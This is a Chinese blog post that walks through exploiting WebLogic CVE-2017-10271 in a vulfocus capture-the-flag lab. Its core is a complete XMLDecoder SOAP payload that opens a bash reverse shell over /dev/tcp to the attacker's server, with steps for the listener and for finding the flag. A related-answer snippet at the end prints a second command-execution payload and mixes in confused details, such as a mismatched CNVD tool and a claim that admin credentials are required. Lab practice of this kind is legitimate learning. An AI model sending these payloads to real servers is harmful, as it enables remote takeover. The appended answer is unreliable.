weblogic cve-2017-10271漏洞复现(vulfocus)

已于 2024-04-07 21:02:30 修改
阅读量363 收藏 1
点赞数 10
分类专栏: 网安漏洞复现 weblogic 文章标签: chrome 前端 服务器 网络安全
于 2024-04-07 20:31:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74294234/article/details/137339650
版权

前沿:此方法基于反向shell的漏洞复现(错误之处请各位大佬多多指教!谢谢)

一:工具:burpsuite、vps服务器。

二:流程

1:先打开靶场镜像地址;

打开:http://114.132.220.165:25170/wls-wsat/CoordinatorPortType

2:先用bp代理抓包

3:发送到重发器并修改payload;(这里的payload来自csdn)

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java version="1.4.0" class="java.beans.XMLDecoder">
                <void class="java.lang.ProcessBuilder">
                    <array class="java.lang.String" length="3">
                        <void index="0">
                            <string>/bin/bash</string>
                        </void>
                        <void index="1">
                            <string>-c</string>
                        </void>
                        <void index="2">
                            <string>bash -i &gt;&amp; /dev/tcp/ip/port 0&gt;&amp;1</string>
                        </void>
                    </array>
                    <void method="start"/>
                </void>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

此处的bash -i &gt;&amp; /dev/tcp/ip/port 0&gt;&amp;1中的ip为你的vps服务器的地址,port为你开启监听的端口(我这里开启监听的端口是8888)发送成功后会显示500状态码

若显示415状态码则是需要在请求头加入Content-Type:text/xml;charset=utf-8

4:开启远程监听(我这里使用的是8888端口开启监听)并获得权限

温馨提示:要先开启监听端口在进行burpsuite反向shell发送

6:在tmp目录下可以得到flag;(指令:find / -name flag*)

小tips:如果你的监听一直失败:可能是你的监听没有打开,你需要在你的vps服务器上打开你的所有端口。

7:提交flag到靶场页面即可;

九号帆船
关注
  • 10
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Weblogic漏洞CVE -2017-10271解决方案-附件资源
03-02
Weblogic漏洞CVE -2017-10271解决方案-附件资源
weblogic CVE-2017-10271修教程
飞乐鸟的博客
10-30 2270
1.简介 CVE-2017-10271是weblogicwls-wsat组件的一个xml反序列化漏洞,可造成远程命令执行。更详细分析可见参考链接,本文强调在进行参考链接修中的一些细节。 2.影响版本 OracleWebLogic Server10.3.6.0.0 OracleWebLogic Server12.1.3.0.0 OracleWebLogic Server12.2.1.1.0 OracleWebLogic Server12.2.1.2.0 打了B25A及其之前版本的补丁都没用,..
Weblogic XMLDecoder反序列化漏洞(CVE-2017-10271)
又菜又爱倒腾的博客
10-29 1025
#Weblogic XMLDecoder反序列化漏洞(CVE-2017-10271)# 一、漏洞简介 weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出反序列化漏洞,导致可执行任意命令。 二、漏洞影响 影响版本 10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0 三、产生原因 CVE-2017-10271漏洞主要是由WebLogic Server WLS组件远程命令执
CVE-2017-10271漏洞
qq_36594628的博客
07-27 5177
CVE-2017-10271 一、启动环境 ​ 靶机:ubantu20.04 IP:192.168.3.115 ​ 攻击机:win10 IP:192.168.1.238 ​ 在ubantu 20.04 搭建 Vulhub 环境中已经介绍了怎么启动环境。 二、漏洞信息 ​ WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击,近期发漏洞的利用方式为传播挖矿程序。 (一)、漏洞描述 ​ 在了解CVE-2017
weblogic相关漏洞
weixin_45605374的博客
06-15 1042
weblogic weblogic中间件是是用来构建网站的必要软件,具有解析、发布网页等功能,它是用纯java开发的 CVE-2017-10271 产生原因 CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。 影响版本 10.3.6.0.0,12.1.3.0.
CVE-2017-10271
qq_56258713的博客
07-03 3044
CVE-2017-10271
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ)
01-09
然而,与所有软件一样,Weblogic也存在安全漏洞,其中CVE-2017-10271是一个著名的反序列化漏洞CVE-2017-10271漏洞源于Weblogic服务器中WLS-Windows-Autopatch组件处理特定类型输入的反序列化过程。这个组件是...
Weblogic CVE-2017-10271.zip
01-21
Weblogic CVE-2017-10271 是一个严重的安全漏洞,涉及Oracle WebLogic Server中的一个未经身份验证的远程代码执行漏洞。这个漏洞是由于WebLogic Server的WLS-WSDL组件处理某些请求时存在缺陷导致的。攻击者可以利用...
WeblogicCVE-2017-10271
01-03
攻击者针对WebLogicWLS组件中存在的CVE-2017-10271远程代码执行漏洞,构造请求对运行的WebLogic中间件主机进行攻击,由于该漏洞利用方式简单,且能够直接获取目标服务器的控制权限,影响范围较广,近期发漏洞的...
Weblogic CVE-2017-10271漏洞
君莫hacker的博客
09-09 1199
Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出反序列化漏洞,导致可执行任意命令。
Weblogic反序列化漏洞CVE-2017-10271)
weixin_46411728的博客
11-14 1579
Weblogic反序列化漏洞CVE-2017-10271)
vulfocus[weblogic反序列化]
qq_44122254的博客
02-18 3750
名称: vulfocus/weblogic-cve_2017_10271:latest 描述: Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。Oracle WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。 Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,
vulhub weblogic CVE-2017-10271
weixin_37639863的博客
02-19 3707
【vulhub】WeblogicCVE-2017-10271)漏洞_樱浅沐冰的博客-CSDN博客_vulhub weblogic漏洞背景介绍Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出反序列化漏洞,导致可执行任意命令。启动vulhub里的weblogic服务漏洞存在于以下路径:http://192.168.100.23:7001//wls-wsat/CoordinatorPortType
Weblogic漏洞CVE -2017-10271解决方案
仅此而已
03-11 5530
补丁包下载链接:https://pan.baidu.com/s/1i6jvOBq6VZAS1XUXGDmMlg 提取码:k6sn
【安全】Apache Tomcat CVE-2017-12617 put请求漏洞方案
热门推荐
而浮生若梦,为欢几何
10-14 1万+
1·背景描述 近期,Apache项目官网发布Tomcat中间件远程代码执行(CVE-2017-12617)漏洞,可导致服务器上的数据泄露或服务器权限被获取;外部专业安全机构分析报告显示该漏洞威胁等级较高,将有关事项通知如下: 一、漏洞情况说明   说明 漏洞编号 CVE-2017-12617(远程代码执行漏洞)
实战:shell脚本练习
为无为,事无事,味无味。
07-19 1240
问题:没有注释的脚本难以理解,特别是在团队协作中,其他成员可能难以快速上手。问题:不进行调试可能导致脚本在实际运行时出未预料的错误,影响系统的稳定性。问题:不立即退出可能导致后续命令基于错误的前提执行,造成更严重的错误。问题:使用未声明的变量可能导致不可预测的行为或错误的输出。好处:确保变量按照预期的方式被引用,防止意外的单词分割。多写注释:在脚本中添加注释,以帮助理解脚本的不同部分。好处:提前发潜在的错误,避免在生产环境中出问题。好处:避免使用未初始化的变量,减少潜在的bug。
Linux中的环境变量
qhy850716的博客
07-17 575
我们思考这样一个问题:指令也是可执行程序,我们写好的编译好的c语言也是程序,为什么我们在执行c语言程序时要./a.out带上当前路径,而ls这种指令就不要带路径呢?这就是环境变量PATH的作用,Linux中存在一些全局设置,表明命令行解释器应该去哪个路径下寻找可执行程序。系统中的很多配置在我们登录Linux时就已经被加载到bash中了,也就是内存。
shell脚本教程学习
最新发布
weixin_54277665的博客
07-19 376
常用bash命令基础,学习后可以在linux系统下进行对应文件的操作。
cve-2017-10271漏洞
06-28
### 回答1: CVE-2017-10271漏洞是Oracle WebLogic Server中的一个远程代码执行漏洞。攻击者可以通过发送特制的HTTP请求来利用该漏洞,从而在受影响的系统上执行任意代码。该漏洞已经被公开披露,并且已经有一些工具可以用来漏洞。但是,我们不建议未经授权的人员进行漏洞,因为这可能会导致系统被攻击者入侵。如果您需要测试您的系统是否受到该漏洞的影响,请咨询安全专家或厂商提供的安全补丁。 ### 回答2: CVE-2017-10271漏洞是Oracle WebLogic Server的一个远程代码执行漏洞,攻击者可以通过构造特定的HTTP请求来向受影响的WebLogic服务器发送恶意代码,在未经授权的情况下执行任意命令或获取服务器操作权限。 漏洞需要以下步骤: 1. 确定漏洞影响的WebLogic版本,CVE-2017-10271漏洞影响的版本为12.1.2.0、12.1.3.0、12.2.1.0、12.2.1.1和12.2.1.2,若WebLogic版本符合以上版本则可以进行后续漏洞操作。 2.通过漏洞利用工具Metasploit或手工构造特定的HTTP请求向受影响的WebLogic服务器发送恶意代码,触发漏洞,远程代码执行。 3.构造特定的HTTP请求需要以下信息: - 目标WebLogic服务器的IP地址和端口号。 - WebLogic管理员账户的用户名和密码,用于获取控制台访问权限。 - 漏洞利用代码,用于构造HTTP请求并发送到目标WebLogic服务器。 其中,漏洞利用代码结构大致如下: POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: target_weblogic_server_ip:target_port Content-Type: text/xml; charset=utf-8 Content-Length: 800 <?xml version="1.0" encoding="UTF-8"?> <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.8.0_131" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>echo "";whoami;id;uname -a;echo "> /tmp/shell;sudo chmod 777 /tmp/shell;/tmp/shell</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> 这段代码用于请求WebLogic服务器上的CoordinatorPortType服务,执行恶意代码,获取远程服务器的操作权限。其中,</string>字符串后面的内容是要在目标服务器上执行的命令。 4.成功漏洞后,攻击者可以通过远程命令执行获取服务器操作权限,对受影响的服务器进行攻击、篡改或窃取敏感数据等恶意行为。 因此,WebLogic管理员应当及时采取措施,升级至最新版本,关闭不必要的端口,增强安全性,以保护WebLogic服务器不受恶意攻击。 ### 回答3: CVE-2017-10271是一个Oracle WebLogic Server中的远程执行代码漏洞漏洞影响Oracle WebLogic Server 10.3.6.0、12.1.3.0、12.2.1.1和12.2.1.2版本。 漏洞步骤如下: 步骤一:下载漏洞工具 首先要下载漏洞工具weblogic-CNVD-2019-48814: git clone https://github.com/tdy218/OracleWeblogic-CNVD-C-2019-48814.git 步骤二:搭建漏洞环境 安装Oracle WebLogic Server 12.2.1.3.0,安装过程略过。在安装完成后,启动Oracle WebLogic Server管理服务: ${ORACLE_HOME}/user_projects/domains/base_domain/bin/startWebLogic.sh 启动管理服务后,访问http://localhost:7001/console,进入控制台界面,输入管理员账号密码,进入控制台主页。 步骤三:运行漏洞利用脚本 进入weblogic-CNVD-2019-48814目录,运行poc.py脚本,如下所示: python poc.py http://localhost:7001 begin ${arbitary command} 其中,http://localhost:7001是WebLogic Server地址,${arbitary command}是任意需要执行的命令,例如: python poc.py http://localhost:7001 begin ls 上述命令将列出当前目录下的文件列表。 漏洞利用成功后,可以看到攻击者执行的命令结果。 除了使用上述脚本之外,攻击者还可以手动利用该漏洞,具体步骤可以查看漏洞详情。 总结: CVE-2017-10271漏洞是一种影响Oracle WebLogic Server的远程执行代码漏洞,攻击者可以利用该漏洞在目标服务器上执行任意命令。为了防止该漏洞的攻击,我们可以进行以下措施: 1. 及时升级Oracle WebLogic Server版本,以防止攻击者利用漏洞; 2. 禁用T3协议,仅允许HTTPS连接; 3. 配置防火墙,限制WebLogic Server管理服务的访问来源; 4. 运行安全软件,及时发漏洞和攻击行为。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值